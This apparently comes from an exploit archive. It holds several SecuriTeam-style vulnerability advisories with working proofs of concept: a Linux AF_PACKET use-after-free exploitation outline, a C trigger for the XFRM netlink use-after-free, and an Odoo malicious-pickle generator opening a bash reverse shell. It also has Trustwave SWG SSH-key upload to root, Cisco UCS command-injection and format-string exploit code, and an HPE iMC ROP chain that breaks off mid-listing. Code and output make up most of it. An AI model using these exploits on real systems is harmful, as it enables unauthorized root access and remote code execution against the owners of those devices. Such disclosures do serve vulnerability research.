[ 73.761994] register_prot_hook.part.52+0x90/0xa0
[ 73.763675] packet_create+0x5e3/0x8c0
[ 73.765072] __sock_create+0x1d0/0x440
[ 73.766030] SyS_socket+0xef/0x1b0
[ 73.766891] ? move_addr_to_kernel+0x60/0x60
[ 73.769137] ? exit_to_usermode_loop+0x118/0x150
[ 73.771668] entry_SYSCALL_64_fastpath+0x13/0x94
[ 73.773754] RIP: 0033:0x44d8a7
[ 73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029
[ 73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7
[ 73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011
[ 73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0
[ 73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410
[ 73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000
[ 73.798567]
[ 73.799095] Allocated by task 1360:
[ 73.800300] save_stack_trace+0x16/0x20
[ 73.802533] save_stack+0x46/0xd0
[ 73.803959] kasan_kmalloc+0xad/0xe0
[ 73.805833] kmem_cache_alloc_trace+0xd7/0x190
[ 73.808233] packet_setsockopt+0x1d29/0x25c0
[ 73.810226] SyS_setsockopt+0x158/0x240
[ 73.811957] entry_SYSCALL_64_fastpath+0x13/0x94
[ 73.814636]
[ 73.815367] Freed by task 1175:
[ 73.816935] save_stack_trace+0x16/0x20
[ 73.821621] save_stack+0x46/0xd0
[ 73.825576] kasan_slab_free+0x72/0xc0
[ 73.827477] kfree+0x91/0x190
[ 73.828523] packet_release+0x700/0xbd0
[ 73.830162] sock_release+0x8d/0x1d0
[ 73.831612] sock_close+0x16/0x20
[ 73.832906] __fput+0x276/0x6d0
[ 73.834730] ____fput+0x15/0x20
[ 73.835998] task_work_run+0x121/0x190
[ 73.837564] exit_to_usermode_loop+0x131/0x150
[ 73.838709] syscall_return_slowpath+0x15c/0x1a0
[ 73.840403] entry_SYSCALL_64_fastpath+0x92/0x94
[ 73.842343]
[ 73.842765] The buggy address belongs to the object at ffff880067d28000
[ 73.842765] which belongs to the cache kmalloc-4096 of size 4096
[ 73.845897] The buggy address is located 2160 bytes inside of
[ 73.845897] 4096-byte region [ffff880067d28000, ffff880067d29000)
[ 73.851443] The buggy address belongs to the page:
[ 73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0
[ 73.861329] flags: 0x100000000008100(slab|head)
[ 73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007
[ 73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000
[ 73.870617] page dumped because: kasan: bad access detected
[ 73.872456]
[ 73.872851] Memory state around the buggy address:
[ 73.874057] ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.876931] ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.878913] >ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.880658] ^
[ 73.884772] ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.890978] ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.897763] ==================================================================
```
We know that the freed object is a kmalloc-4096 object:
```
struct packet_fanout {
possible_net_t net;
unsigned int num_members;
u16 id;
u8 type;
u8 flags;
union {
atomic_t rr_cur;
struct bpf_prog __rcu *bpf_prog;
};
struct list_head list;
struct sock *arr[PACKET_FANOUT_MAX];
spinlock_t lock;
refcount_t sk_ref;
struct packet_type prot_hook ____cacheline_aligned_in_smp;
};
```
and that its prot_hook member is the one being referenced in the packet handler when registered via dev_add_pack() from register_prot_hook() inside af_packet.c:
```
struct packet_type {
__be16 type; /* This is really htons(ether_type). */
struct net_device *dev; /* NULL is wildcarded here */
int (*func) (struct sk_buff *,
struct net_device *,
struct packet_type *,
struct net_device *);
bool (*id_match)(struct packet_type *ptype,
struct sock *sk);
void *af_packet_priv;
struct list_head list;
};
```
The function pointers inside of struct packet_type, and the fact it is in a big slab (kmalloc-4096) makes heap spraying easier and more reliable as bigger slabs are less often used by the kernel.
We can use usual kernel heap spraying to replace the content of the freed packet_fanout object by using for example sendmmsg() or any other mean.
Even if the allocation is not permanent, it will still replace the targeted content in packet_fanout (ie. the function pointers) and due to the fact that kmalloc-4096 is very stable, it is very less likely that another allocation will corrupt our payload.
id_match() will be called when sending a skb via dev_queue_xmit() which can be reached via a sendmsg on a AF_PACKET socket. It will loop through the list of packet handler calling id_match() if not NULL. Thus, we have a PC control situation.
Once we know where the code section of the kernel is, we can pivot the kernel stack into our fake packet_fanout object and ROP. The first argument ptype contains the address of the prot_hook member of our fake object, which allows us to know where to pivot.
Once into ROP, we can jump into native_write_c4(x) to disable SMEP/SMAP, and then we could think about jumping back into a userland mmaped executable payload that would call commit_creds(prepare_kernel_cred(0)) to elevate our user process privilege to root.

223
exploits/linux/local/44049.md Normal file
View file

@ -0,0 +1,223 @@
## Vulnerability Summary
The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem XFRM.
Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.
## Credit
An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
The vulnerability has been addressed as part of 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”) patch: CVE-2017-16939
```
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr
static int xfrm_dump_policy_done(struct netlink_callback *cb)
{
- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
struct net *net = sock_net(cb->skb->sk);
xfrm_policy_walk_done(walk, net);
return 0;
}
+static int xfrm_dump_policy_start(struct netlink_callback *cb)
+{
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
+
+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));
+
+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);
+ return 0;
+}
+
static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)
{
struct net *net = sock_net(skb->sk);
- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
struct xfrm_dump_info info;
- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >
- sizeof(cb->args) - sizeof(cb->args[0]));
-
info.in_skb = cb->skb;
info.out_skb = skb;
info.nlmsg_seq = cb->nlh->nlmsg_seq;
info.nlmsg_flags = NLM_F_MULTI;
- if (!cb->args[0]) {
- cb->args[0] = 1;
- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);
- }
-
(void) xfrm_policy_walk(net, walk, dump_one_policy, &info);
return skb->len;
@@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {
static const struct xfrm_link {
int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);
+ int (*start)(struct netlink_callback *);
int (*dump)(struct sk_buff *, struct netlink_callback *);
int (*done)(struct netlink_callback *);
const struct nla_policy *nla_pol;
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {
[XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },
[XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },
[XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,
+ .start = xfrm_dump_policy_start,
.dump = xfrm_dump_policy,
.done = xfrm_dump_policy_done },
[XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
{
struct netlink_dump_control c = {
+ .start = link->start,
.dump = link->dump,
.done = link->done,
};
```
## Vulnerability details
An unprivileged user can change Netlink socket subsystem XFRM value sk->sk_rcvbuf (sk == struct sock object).
The value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read.
The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).
skb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time.
For example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r.
By calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.
When we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called.
xfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true.
The xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object.
When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.
netlink_dump():
In above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot).
When this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesnt changed to false.
nlk->cb_running is true, thus xfrm_dump_policy_done() is being called.
nlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.
## Proof of Concept
The following proof of concept is for Ubuntu 17.04.
```
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <asm/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>
#include <sched.h>
#include <unistd.h>
#define BUFSIZE 2048
int fd;
struct sockaddr_nl addr;
struct msg_policy {
struct nlmsghdr msg;
char buf[BUFSIZE];
};
void create_nl_socket(void)
{
fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);
memset(&addr,0,sizeof(struct sockaddr_nl));
addr.nl_family = AF_NETLINK;
addr.nl_pid = 0; /* packet goes into the kernel */
addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
}
void do_setsockopt(void)
{
int var =0x100;
setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));
}
struct msg_policy *init_policy_dump(int size)
{
struct msg_policy *r;
r = malloc(sizeof(struct msg_policy));
if(r == NULL) {
perror("malloc");
exit(-1);
}
memset(r,0,sizeof(struct msg_policy));
r->msg.nlmsg_len = 0x10;
r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
r->msg.nlmsg_seq = 0x1;
r->msg.nlmsg_pid = 2;
return r;
}
int send_msg(int fd,struct nlmsghdr *msg)
{
int err;
err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));
if (err < 0) {
perror("sendto");
return -1;
}
return 0;
}
void create_ns(void)
{
if(unshare(CLONE_NEWUSER) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(1);
}
if(unshare(CLONE_NEWNET) != 0) {
perror("unshared(CLONE_NEWUSER)");
exit(2);
}
}
int main(int argc,char **argv)
{
struct msg_policy *p;
create_ns();
create_nl_socket();
p = init_policy_dump(100);
do_setsockopt();
send_msg(fd,&p->msg);
p = init_policy_dump(1000);
send_msg(fd,&p->msg);
return 0;
}
```

45
exploits/linux/local/44064.md Normal file
View file

@ -0,0 +1,45 @@
## Vulnerability Summary
The following advisory describe arbitrary Python code execution found in Odoo CRM version 10.0
Odoo is a suite of open source business apps that cover all your company needs: CRM, eCommerce, accounting, inventory, point of sale, project management, etc. Odoos unique value proposition is to be at the same time very easy to use and fully integrated.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Odoo has done a private disclosure for the issue we reported, and the patch was merged in all supported branches.
CVE: CVE-2017-10803
The full public disclosure will be available at https://github.com/odoo/odoo/issues/17898.
## Vulnerability Details
One of the core Odoo modules, Database Anonymization, allows an administrator to anonymize the contents of the Odoo database. The module does this by serializing the contents of the existing database using Pythons pickle module into a backup file before modifying the contents of the database. The administrator can then de-anonymize the database by loading the pickled backup file.
Pythons pickle module can be made to execute arbitrary Python code when loading an attacker controlled pickle file. With this, an administrator can execute arbitrary Python code with the same privilege level as the Odoo webapp by anonymizing the database then attempt the de-anonymization process with a crafted pickle file.
## Proof of Concept
In order to exploit the vulnerability, you should navigate to the Apps page (the link is in the navigation bar at the top and search for and install “Database Anonymization” in the search bar. We have to deselect the “Apps” filter in the search bar for it to show up.
Once we have the module installed, we navigate to the settings page and select “Anonymize database” under “Database anonymization” and click on the “Anonymize Database” button. Next, we refresh the page and navigate to the same page under settings. We upload the “exploit.pickle” file generated our script and click on “Reverse the Database Anonymization” button. We should have a reverse shell.
The following Python file generate a malicious pickle file that attempts (via bash) to connect back to a listener on port 8000:
```
import cPickle
import os
import base64
import pickletools
class Exploit(object):
def __reduce__(self):
return (os.system, (("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"),))
with open("exploit.pickle", "wb") as f:
cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
```
We then use netcat listener on port 8000:
```
ncat -nlvp 8000
```

61
exploits/linux/remote/44047.md Normal file
View file

@ -0,0 +1,61 @@
## Vulnerability Summary
The following advisory describes an unauthorized access vulnerability that allows an unauthenticated user to add their own SSH key to a remote Trustwave SWG version 11.8.0.27.
Trustwave Secure Web Gateway (SWG) “provides distributed enterprises effective real-time protection against dynamic new malware, strong policy enforcement, and a unique Zero-Malware Guarantee when managed for you by our experts.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Trustwave was informed of the vulnerability, and released the following advisory: https://www.trustwave.com/Resources/Trustwave-Software-Updates/Important-Security-Update-for-Trustwave-Secure-Web-Gateway/
CVE: CVE-2017-18001
## Vulnerability details
Trustwave SWG allows remote attackers to send to the SWG product a SSH key that will be used by the SWG product as the SSH key to logon to the device.
This allows unauthenticated user to send a POST request to /sendKey
```
POST /sendKey HTTP/1.1
Host: trustwave.device:5222
Content-Length: 558
content-type: multipart/form-data
user-agent: libwww-perl/6.15
Connection: close
--xYzZY
Content-Disposition: form-data; name="publicKey"; filename="public_key_to_send"
Content-Type: text/plain
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFxLGHCIST4jLDreJoQZnIZX6Fcx/ZyM1dzR2ZSwPG7UC3GYs61/cRGFvL9yuPZwIn8f/p9MCMoKHIG1gNZu0i7pqqZgB5vL+Dbf1vXl4PLY0wwcNMyVUBJaTSHdHSqe1KGBcM/1/gMsGpgcOJw2XMNubmXZxRSFSQLca1BsDmEyPF1KVpGfk60GtEH+c5E6ScEaTP7h0NcM6zEl9gubO2R+cq9FsPcMwF4bdsxyEZYGtVdS8B4goewEt1Nj+1hAzBWGox+hySee0QshZFAvZUrfcn4TsOd1iT95jAFoIDReQn781hmT6YQBpnl7HbDp6otyXAxrsvMOg1fvriAzHv rsyncuser
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
--xYzZY--
```
Which will add the supplied ssh key to Trustwave SWG, which we can use it to login to the device:
```
/usr/bin/ssh -q -o PasswordAuthentication=no -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o ServerAliveInterval=10 -i ./test.key commander@trustwave.device
Last login: Fri Aug 25 9:01:23 2017 from x.x.x.x
SWG Version : 11.8.0.27
SWG Maintenance Release : 0
Role : vs
Machine Type : NG-6000
```
If we will run the id command via ssh we will get the following response:
```
-sh-4.1$ id
uid=1000(rsyncuser) gid=48(apache) groups=48(apache)
```
Once we connected to Trustwave SWG via SSH we can run commands as root by accessing /opt/finjan/msh/run_inside.py
```
# sudo /opt/finjan/msh/run_inside.py bash
bash-4.1# id
uid=0(root) gid=0(root) groups=0(root)
```

304
exploits/linux/remote/44052.md Normal file
View file

@ -0,0 +1,304 @@
## Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator version 3.1(2ePE1).
Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured and managed by Cisco UCS Manager. For example, you can use Cisco UCS Platform Emulator to create and test a supported Cisco UCS configuration, or to duplicate an existing Cisco UCS environment for troubleshooting or development purposes.
The vulnerabilities found in Cisco UCS Platform Emulator are:
Unauthenticated remote code execution
Authenticated remote code execution
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
The vendor has released patches to address this vulnerability and issue the following CVE:
CVE-2017-12243
Vulnerabilities details
Unauthenticated remote code execution
User controlled input is not sufficiently sanitized when passed to IP/settings/ping function. An unauthenticated attacker can inject commands via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root on the remote machine.
## Proof of Concept
```
curl "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl -k "https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
curl -k "https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1"
```
By sending one of the above requests the Cisco UCS will response with:
```
/sample output/
================
demo@kali:~/poc$ curl -k "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms
Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU/Linux
demo@kali:~/poc$ curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
uid=0(root) gid=0(root) groups=0(root)
```
Authenticated remote code execution
Cisco UCS Platform Emulator is vulnerable to format string vulnerability that leads to remote code execution.
Cisco UCS Platform Emulator runs an SSH server by default, and users who log-in via ssh runs the following command:
```
show sel %x
```
Get the following response:
```
"Error: Invalid rack server value: ...somedigits.."
```
By execute the ssh “show sel %x” command we overwriting got entry for _ZN7clidcos15CommandEmulator16cli_param_filterEPKc function from libsamvsh.so with libc system.
## Proof of Concept
In order to exploit the vulnerability, please follow the following instructions:
Install ucspe on vm (setup all 3 network cards) with the following user and password:
Default ucspe user : ucspe
Default ucspe pass : ucspe
Run the ucspe and write down the ip address of the ucspe (visible in console “Connected to IP: ….”)
In this Proof of Concept we will use IP 192.168.1.43
Open up two terminals on some other machine (kali for example).
On the first terminal:
Create poc directory, put poc4_ucspe_3.1.2e.py in the poc directory. change current directory to poc
Create fifo1:
```
mkfifo fifo1
```
Create output directory:”
```
mkdir output
```
Run ssh with stdin redirected from fifo1 and stdout redirected to output/log file:
```
tail -f fifo1 | ssh ucspe@192.168.1.43 > output/log
# use default credentials ucspe/ucspe
```
# use default credentials ucspe/ucspe
On the second terminal (terminal2):
Change current directory to poc
Run the poc4_ucspe_3.1.2e.py
The output should be:
TERMINAL1
```
demo@kali:~/poc$ mkfifo fifo1
demo@kali:~/poc$ mkdir output
demo@kali:~/poc$ tail -f fifo1 | ssh ucspe@192.168.1.43 > output/log
Pseudo-terminal will not be allocated because stdin is not a terminal.
The authenticity of host '192.168.1.43 (192.168.1.43)' can't be established.
RSA key fingerprint is SHA256:qEdgqNFyfqA2BU1+cH9rmYrsIOiQr/NlCpgAyzrX70Y.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.43' (RSA) to the list of known hosts.
uucspe@192.168.1.43's password:
TERM environment variable not set.
```
TERMINAL2
```
demo@kali:~/poc$ python poc4_ucspe_3.1.2e.py
Going through some menus please wait a moment..
You should now see on the other terminal message simmilar to "Error: Already in local-mgmt shell.."
[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&) addres from libsamvsh.so
-> 0x6b9f64
[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt
-> 0x6d7a70
[.] Dumping snprintf address from libc
-> 0x7791210
[.] Calculating libc system address
-> libc base addr = 0x7746000
-> system addr = 0x7780f60
[.] Sending payload..
show sel %62c%28$nAAA
show sel %237c%28$nAA
show sel %86c%28$nAAA
show sel %229c%28$nAA
Sleep for fork adjustment..
Ok please type your commands (type exit for exit)
> id
['uid=0(root) gid=0(root) groups=0(root)']
>
```
poc4_ucspe_3.1.2e.py
```
import struct
import time
import binascii
def generate_payload(addr):
basepayload = "show sel AAAAAAAAAAAA"
aa = (addr >> 24 & 0xff)
bb = (addr >> 16 & 0xff)
cc = (addr >> 8 & 0xff)
dd = (addr >> 0 & 0xff)
if aa<34:
aa_c_payload = aa + 222
else:
aa_c_payload = aa - 34
if bb<34:
bb_c_payload = bb + 222
else:
bb_c_payload = bb - 34
if cc<34:
cc_c_payload = cc + 222
else:
cc_c_payload = cc - 34
if dd<34:
dd_c_payload = dd + 222
else:
dd_c_payload = dd - 34
aa_payload = "%" + str(aa_c_payload) + "c%28$n"
bb_payload = "%" + str(bb_c_payload) + "c%28$n"
cc_payload = "%" + str(cc_c_payload) + "c%28$n"
dd_payload = "%" + str(dd_c_payload) + "c%28$n"
aap = basepayload[:9] + aa_payload + basepayload[len(aa_payload)+9:]
bbp = basepayload[:9] + bb_payload + basepayload[len(bb_payload)+9:]
ccp = basepayload[:9] + cc_payload + basepayload[len(cc_payload)+9:]
ddp = basepayload[:9] + dd_payload + basepayload[len(dd_payload)+9:]
return [aap,bbp,ccp,ddp]
def clearlog():
fo = open("output/log","w")
fo.truncate()
fo.close()
def readlog():
logread = [line.strip('\n\0x00') for line in open('output/log')]
return logread
def sendcommand(cmd):
f=open("fifo1", "a+")
f.write(cmd+"\n")
f.close()
def dump(adr, frmt='p'):
clearlog()
leak_part = "show sel %28${}".format(frmt)
raw_addr = struct.pack("I", adr)
if "\x20" in raw_addr:
print "space!"
out = leak_part + "AAAAAAA"+raw_addr
sendcommand(out)
time.sleep(2)
e = readlog()[0]
outbin = e.split("AAAAAAA")[0].split(": ")[2]
clearlog()
return outbin+"\x00"
def starting_point():
clearlog()
out = "show sel %147$x"
sendcommand(out)
time.sleep(2)
e = readlog()[0]
outbin = e.split("AAAAAAA")[0].split(":")[2]
clearlog()
return outbin
clidcos_step = 0x1DB0C
libc_emulator_snprintf = 0x0004b210
libc_emulator_system = 0x0003af60
print "Going through some menus please wait a moment.."
sendcommand("c")
time.sleep(1)
sendcommand("show version")
time.sleep(1)
sendcommand("connect local-mgmt")
time.sleep(1)
sendcommand("connect local-mgmt")
time.sleep(1)
sendcommand("show version")
time.sleep(5)
clearlog()
print "You should now see on the other terminal message simmilar to \"Error: Already in local-mgmt shell..\" "
print "[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&) addres from libsamvsh.so"
off3 = int(starting_point(),16)
print " -> " + hex(off3)
print "[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt"
clidcosGOTPLT = off3+clidcos_step
print " -> " + hex(clidcosGOTPLT)
print "[.] Dumping snprintf address from libc"
libc_printf = dump(clidcosGOTPLT+8,'s')[:4]
libc_tmp1_hex = binascii.hexlify(libc_printf[::-1])
libc_snprintf_addr = int(libc_tmp1_hex, 16)
print " -> " + hex(libc_snprintf_addr)
print "[.] Calculating libc system address"
libc_base_addr = libc_snprintf_addr - libc_emulator_snprintf
print " -> libc base addr = " + hex(libc_base_addr)
libc_system_addr = libc_base_addr + libc_emulator_system
print " -> system addr = " + hex(libc_system_addr)
print "\n[.] Sending payload.."
sendcommand(generate_payload(libc_system_addr)[3] + struct.pack("I", clidcosGOTPLT))
print generate_payload(libc_system_addr)[3]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[2] + struct.pack("I", clidcosGOTPLT+1))
print generate_payload(libc_system_addr)[2]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[1] + struct.pack("I", clidcosGOTPLT+2))
print generate_payload(libc_system_addr)[1]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[0] + struct.pack("I", clidcosGOTPLT+3))
print generate_payload(libc_system_addr)[0]
sendcommand("show version")
time.sleep(1)
print "Sleep for fork adjustment.."
time.sleep(5)
sendcommand("ssh /bin/bash")
print "Ok please type your commands (type exit for exit)"
time.sleep(2)
while True:
n = raw_input("> ")
if 'exit' in n:
break
clearlog()
sendcommand(n)
time.sleep(2)
print readlog()
```

203
exploits/linux/remote/44073.md Normal file
View file

@ -0,0 +1,203 @@
## Vulnerability Summary
The following advisory describes a Stack Buffer Overflow vulnerability found in HPE Intelligent Management Center version v7.2 (E0403P10) Enterprise, this vulnerability leads to an exploitable remote code execution.
HPE Intelligent Management Center (iMC) delivers comprehensive management across campus core and data center networks. iMC converts meaningless network data to actionable information to keep your network, and your business, moving.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
HPE has released a patch to address this vulnerability and issued the following CVE-2017-5815.
## Vulnerability Details
HPE Intelligent Management Center (iMC) is vulnerable to a stack buffer overflow that lead to remote code execution. The imcsyslogdm service handles syslog messages received on UDP port 514.
The imcsyslogdm service handles the forwarded messages by using FORWARD_HEAD ( Forwarded From:) and FORWARD_HEAD_END (Quidview) markers at the beginning of the packet to indicate the originator of the syslog message. In case theres a FORWARD_HEAD marker but no FORWARD_HEAD_END, the application ends up copying the contents of the packet into a fixed-size stack buffer that is vulnerable to a buffer overflow.
## Proof of Concept
The first stage of the proof of concept is used to trigger the overflow and start a ROP chain by sending data on UDP port 514. The application also binds to UDP port 65535 but doesnt seem to use it. After we triggered the buffer overflow, we will look for the file descriptor of this socket the file descriptor number of this socket seems to be the number 27 most of the time, and the number 28 occasionally. To avoid non-determinism, the ROP chain retrieves the file descriptor number from the singleton instance holding it.
Then it reads 0x25f bytes into the .bss and pivots the stack there. The second stage contains another ROP chain, the command to be executed, and some helper strings. It resolves the address of system in libc via dlopen and dlsym. Executes the command via system. The command length is currently limited to ~470 bytes (the exploit checks for this) but could be extended for more and ends in an infinite loop.
While termination is avoided this way, this thread is responsible for handling syslog messages, so that function of the program will be broken.
```
#!/usr/bin/env python2
import socket
import struct
IP = '192.168.0.20'
PORT = 514
# the command to execute
command = 'echo "OK GOOGLE!" > /etc/issue ; #\0'
# port to use for the second stage payload, this is created during normal operation
# of the application, we just reuse it because there's no other thread waiting on it
# like in the case of the initial udp/514 vector, which could interfere with sending
# the second stage
PORT_SECOND_STAGE = 65535
# markers used for forwarded syslog messages
SYSLOG_FORWARD_HEAD = 'Forwarded From:'
SYSLOG_FORWARD_HEAD_END = 'Quidview'
def rop(*args):
return struct.pack('I' * len(args), *args)
# mock object of the ELF class from pwntools so that the final exploit doesn't depend on it
class ELF:
def bss(self, offset):
return 0x884D0C0 + offset
plt = {
'read': 0x805957C,
'dlopen': 0x805857C,
'dlsym': 0x80597BC,
}
e = ELF()
# strings used in the second stage
libc_str = 'libc.so.6\0'
system_str = 'system\0'
# ROP gadgets from, the latest available version:
# (Intelligent Management Center Enterprise (7.2_E0403) with E0403P10 applied
# [root@vm bin]# md5sum imcsyslogdm
# 8b06adbd3d47a372358d9106e659d9b2 imcsyslogdm
pop2_ret = 0x0805b137 # pop edi ; pop ebp ; ret
pop3_ret = 0x08480408 # pop edi ; pop ebx ; pop ebp ; ret
pop4_ret = 0x084f213a # pop edi ; pop esi ; pop ebx ; pop ebp ; ret
zero_edx = 0x084f90c1 # xor edx, edx ; ret
inc_edx = 0x0811c5e6 # inc edx ; ret
pop_ebx = 0x080dd8cd # pop ebx ; ret
# used to write values obtained dynamically by the ROP chain to the stack
eax_to_stack = 0x08703fba # mov dword ptr [esp + edx*8], eax ; adc dword ptr [ebx], eax ; ret
ret = 0x080485c0 # ret
add_eax_28 = 0x084ddd16 # add eax, 0x1c ; pop ebp ; ret
dec_eax = 0x080dd660 # dec eax ; ret
zero_eax = 0x080834d4 # xor eax, eax ; ret
add_eax_25f = 0x0845f636 # add eax, 0x25f ; pop ebx ; pop ebp ; ret
ret_C = 0x0814b04e # ret 0xc
xchg_eax_esp = 0x0807a2c7 # xchg eax, esp ; ret
pop_eax = 0x0837db70 # pop eax ; ret
get_instance = 0x08091210 # ::instance of a Singleton used to retrieve a socket fd
mov_eax_eax_plus_0x5c = 0x08562d44 # mov eax, dword ptr [eax + 0x5c] ; ret
# the offset of the second stage into the .bss
second_stage_offset_into_bss = 0x6500
second_stage_data = libc_str + system_str + command
# place the data above the rop chain so that the stack usage of functions
# won't clobber it. Also, the second ROP chain has to be shorter than this.
second_stage_data_offset = 120
# the length of the command to be executed is limited to around 470 bytes
assert len(command) < 0x25f - second_stage_data_offset - len(system_str) - len(libc_str)
# the first stage has to be 0-byte free, so we do as little as possible here to read in a second stage
first_stage = rop(
# the stack write gadget (`eax_to_stack` above) writes eax to [esp + edx*8]
zero_edx,
inc_edx,
inc_edx,
